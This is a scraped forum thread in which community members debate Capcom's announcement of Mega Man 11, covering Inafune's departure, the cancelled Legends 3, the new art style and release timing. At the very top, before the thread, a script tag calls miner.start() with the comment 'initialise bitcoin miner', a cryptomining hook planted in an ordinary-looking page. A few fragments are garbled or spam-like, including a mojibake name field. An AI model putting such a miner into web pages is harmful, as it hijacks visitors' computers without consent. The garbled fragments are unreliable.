<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectsmbx community

Mega Man 11

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Ashan
It's easier than you think to look pioneer .
First name: Hayden

Mega Man 11

Postby Ashan » 1 week ago

Just announced by Capcom

No 8-bit art style on this one. Visually it's reminding me a lot of Mighty No. 9 so far, not to jinx it.

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Re: Mega Man 11

Postby TheFinalSentinel » 1 week ago

Hmm... C-side might take longer than we all expected.

Ashan

raocow saved Mega Man

ano0maly
Retired Tester

Postby ano0maly » 1 week ago

I see or have multiple problems with this:
  • Inafune left Capcom.
  • Name confusion with X1 (technically there was already a name clash when 10 was made).
  • People are bitter at Capcom for cancelling Legends 3 with no consolation measure or efforts to properly resolve the situation (no release of prototype, blaming fans on Twitter), among other things, although some of this has since been redirected to Inafune and his Mighty No. 9 team for that game and the Red Ash debacle.
  • Other Megaman series are being neglected (like a possible continuation of ZX).
  • Rehashing the same formula 11 times can get stale (not to mention those spinoff games in the C-side right now that Classic in particular got). If the X series was "supposed to end at 5" there's no law saying that reasoning can't apply to Classic.
I personally would not want another Classic sequel unless it makes a decisive climax or progress with the background story settings (like Wily outright dies) or reveals significant new insights that help connect Classic with X.
Image << Click!

Fan of the following:
Image Image

Ashan

I think the fact that they're making an entirely new engine with 3D graphics and everything speaks something to the fact that they're not just purely recycling content. They could have easily reused the 9/10 engine for 11 (and I actually might have liked that? We'll see) and got the game done from start to finish in a fairly short amount of time. But they're doing something new-looking, at the very least. And even after what is done now, it's scheduled for release late 2018, so they're taking their time.

Bean

Postby Bean » 1 week ago

ano0maly wrote: I see or have multiple problems with this:
  • Inafune left Capcom.
  • Name confusion with X1 (technically there was already a name clash when 10 was made).
  • People are bitter at Capcom for cancelling Legends 3 with no consolation measure or efforts to properly resolve the situation (no release of prototype, blaming fans on Twitter), among other things, although some of this has since been redirected to Inafune and his Mighty No. 9 team for that game and the Red Ash debacle.
  • Other Megaman series are being neglected (like a possible continuation of ZX).
  • Rehashing the same formula 11 times can get stale (not to mention those spinoff games in the C-side right now that Classic in particular got). If the X series was "supposed to end at 5" there's no law saying that reasoning can't apply to Classic.
Inafune only took over managing the series around the time of MMX2 in 1995, Legends 3 was canned over six years ago now, I really doubt peeps would get 11 and X1 confused, other Mega Man series didn't sell like ZX and Star Force to warrant a continuation, the art style is definitely different here... and I kind of don't want the series to end.
I personally would not want another Classic sequel unless it makes a decisive climax or progress with the background story settings (like Wily outright dies) or reveals significant new insights that help connect Classic with X.
Wily outright dying is like Bowser going away for good. That should never happen. We all know MMX happens, just let the Classic series keep pumping out games in the meantime!

Ashan

I'm hoping a lot of this is side-effects of it being early in development, but I have to say I'm not a fan of either the running animation, or the fact that Mega Man has to yell whenever he's doing a charge shot. The music also felt a tad lacklustre.

Slimeman01
Wanting more game money
First name: Matt
Pronouns: he/him/his

Postby Slimeman01 » 1 week ago

Wow, a Megaman game I'll be able to physically play for the first time! I'm really hyped for this, I can't wait for this!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

Kapus
Master of Hiccup
First name: Yes
Pronouns: she/her/veggie

Postby Kapus » 6 days ago

Ultra hyped. Capcom finally delivered! And they're finally shaking up the paradigm a bit and trying a more fresh direction. So far it's all I ever wanted.
ano0maly wrote: I see or have multiple problems with this:
  • Inafune left Capcom.
  • We don't need Inafune.
  • That hasn't been an issue since they stopped using roman numerals??
  • I mean yeah but this time they're giving the (classic) fans what they want and the reception has been positive. The cancellations in the past were unfortunate but...well, they're in the past.
  • All the Mega Man series have been neglected though. They're reviving classic right now and X collection is coming to the Switch. I don't really see the issue? One thing at a time, right?
  • That's kinda why there hasn't been a classic game in a while. If you watched the stream the developers talked about how they've been trying to evolve mega man past the rather stale formula they've been going with for the past 10 games. They're conscious of the issue and are trying to make things fresher this time around, which is pretty evident of the artstyle alone I'd say.
I wouldn't mind showing hints towards X series or something, but I wouldn't want them to have a direct conclusion to the classic series. The ambiguity of what exactly takes place "inbetween" is what keeps it interesting.

warpio

Postby warpio » 6 days ago

Ashan wrote: raocow saved Mega Man
I wouldn't be the least bit surprised if this huge MM LP series was secretly a crazy esoteric ritual summoning MM11 into existence. that's some sick wizardry skills if true :shock:

SAJewers
hi

Postby SAJewers » 4 days ago

ImageImageImage
ImageImageImageImage

Slimeman01
Wanting more game money
First name: Matt
Pronouns: he/him/his

Postby Slimeman01 » 4 days ago

warpio wrote:
Ashan wrote: raocow saved Mega Man
I wouldn't be the least bit surprised if this huge MM LP series was secretly a crazy esoteric ritual summoning MM11 into existence. that's some sick wizardry skills if true :shock:
if he saved it does this mean we can blame him if its bad
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

Return to “the cartridgé”